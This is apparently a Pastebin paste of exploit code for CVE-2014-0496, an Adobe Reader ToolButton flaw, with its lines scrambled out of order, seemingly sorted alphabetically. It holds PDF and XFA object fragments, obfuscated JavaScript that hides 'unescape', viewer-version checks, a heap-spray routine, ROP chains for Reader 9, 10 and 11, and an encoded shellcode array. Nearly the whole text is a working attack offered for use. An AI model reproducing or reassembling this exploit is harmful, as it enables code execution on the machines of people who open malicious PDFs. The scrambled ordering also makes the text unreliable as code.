Advertisement
physicaldrive0

CVE-2014-0496 Adobe Pdf Exploit ToolButton

Sep 5th, 2014
3,936
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.86 KB | None | 0 0
  1. @PhysicalDrive0
  2.  
  3. });
  4. 1 0 obj
  5. 2 0 obj
  6. 3 0 obj
  7. 4 0 obj
  8. 5 0 obj
  9. 6 0 obj
  10. 7 0 obj
  11. aaa += aaa;
  12. aa=dd13.split("%u");
  13. aa[i]=str12+aa[i];
  14. /AcroForm 6 0 R
  15. addButtonFunc = function () {
  16. af1="aaaaa%aaaaaaaauaaaaaa";
  17. af1=af1[("112","a2s1","replace")](/a/g,'');
  18. app.addToolButton({
  19. app.addToolButton({
  20. app.alert('123');
  21. app.removeToolButton({
  22. as1211();
  23. bbb += aaa;
  24. bbb = bbb.substring(0, i11 / 2);
  25. bbb += sa;
  26. bbb += str;
  27. break;
  28. ccc += ccc;
  29. cEnable: "addButtonFunc();"
  30. cEnable: "removeButtonFunc();"
  31. cExec: "1",
  32. cExec: "1",
  33. cName: "evil"
  34. cName: "evil",
  35. cName: "xxx",
  36. </config>
  37. <config xmlns="http://www.xfa.org/schema/xci/2.6/">
  38. /Count 1
  39. dd13=aa.join('%u');
  40. dd13=af1+dd13;
  41. dd13=xx13.join('%u');
  42. } else {
  43. } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
  44. } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
  45. endobj
  46. endstream
  47. for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141");
  48. for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
  49. for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
  50. for (i = 0; i < aa[tt1]; i++)
  51. for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141");
  52. function as1211()
  53. function heapSpray(str, str_addr, r_addr) {
  54. function opp12(xx13)
  55. heapSpray(payload, ret_addr, r_addr);
  56. if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
  57. if(ccc[tt] >= (0x40000*2))
  58. if(j)
  59. if (!r11) {
  60. if (vulnerable) {
  61. j=4-aa[i][tt1];
  62. /Kids [3 0 R]
  63. <</Length 10074>>
  64. <</Length 372>>
  65. obj_size = 0x330 + 0x1c;
  66. obj_size = 0x360 + 0x1c;
  67. obj_size = 0x370;
  68. /OpenAction 4 0 R
  69. /Pages 2 0 R
  70. <pageSet></pageSet>
  71. /Parent 2 0 R
  72. part1 += rop_addr;
  73. %%%%%PDF-6.5
  74. PE/%%%%%%
  75. <present><pdf><interactive>1</interactive></pdf></present>
  76. r11 = true;
  77. r_addr = 0x08a8;
  78. r_addr = 0x08e4;
  79. r_addr = 0x08e8;
  80. removeButtonFunc = function () {
  81. ret_addr = this[un12]("%u8003%u4a84");
  82. ret_addr = this[un12]("%ua83e%u4a82");
  83. ret_addr = this[un12]("%ua8df%u4a82");
  84. return;
  85. return dd13;
  86. rop_addr = this[un12]("%u08a8%u0c0c");
  87. rop_addr = this[un12]("%u08e4%u0c0c");
  88. rop_addr = this[un12]("%u08e8%u0c0c");
  89. rop = rop10;
  90. rop = rop11;
  91. rop = rop9;
  92. <</Size 8/Root 1 0 R>>
  93. str12=new Array(j+1).join("0");
  94. stream
  95. <subform name="form1" layout="tb" locale="en_US">
  96. </subform></template></xdp:xdp>
  97. <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
  98. trailer
  99. tt1=tt1[("112","a2s1","replace")](/a/g,'');
  100. tt=tt[("112","a2s1","replace")](/a/g,'');
  101. /tYPE/aCTION/S/JavaScript/JS 5 0 R>>
  102. /type /Page
  103. /Type /Page
  104. /Type /Pages
  105. un12='';
  106. un12=un12[("112","as1","replace")](/w/g,'');
  107. un12="uwnwwewwwswcwwwawwpwe";
  108. var aaa = this[un12]("%u0c0c");
  109. var arr = new Array();
  110. var bbb = aaa.substring(0, i1 / 2);
  111. var ccc = bbb.substring(0, i2 / 2);
  112. var ddd = ccc.substring(0, 0x80000 - i3);
  113. var eee = new Array();
  114. var executable = "";
  115. var i11 = 0x0c0c - 0x24;
  116. var i1 = r_addr - 0x24;
  117. var i2 = 0x4000 + 0xc000;
  118. var i3 = (0x1020 - 0x08) / 2;
  119. var obj_size;
  120. var part1 = "";
  121. var part2 = "";
  122. var part2_len = obj_size - part1[tt1] * 2;
  123. var payload = rop + shellcode;
  124. var r11 = false;
  125. var r_addr;
  126. var ret_addr;
  127. var rop;
  128. var rop10 = this[("123","1a1",un12)](opp12(xx132));
  129. var rop11 = this[("123","1a1",un12)](opp12(xx131));
  130. var rop9 = this[("123","1a1",un12)](opp12(xx133));
  131. var rop_addr;
  132. var sa = str_addr;
  133. var shellcode = this[("123","1a1",un12)](opp12(xx134));
  134. var tt1="alaaeaanaaagataaah";
  135. var tt="alaaeaanaagataah";
  136. var vulnerable = true;
  137. var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16));
  138. var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16));
  139. var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16));
  140. var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16));
  141. vulnerable = false;
  142. while (1)
  143. while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa;
  144. while (sa[tt] < (xxx - r_addr)) sa += sa;
  145. x11=9;
  146. <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  147. <</XFA 7 0 R>>
  148. <?xml version="1.0" encoding="UTF-8"?>
  149. xxx=0x0c0c;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement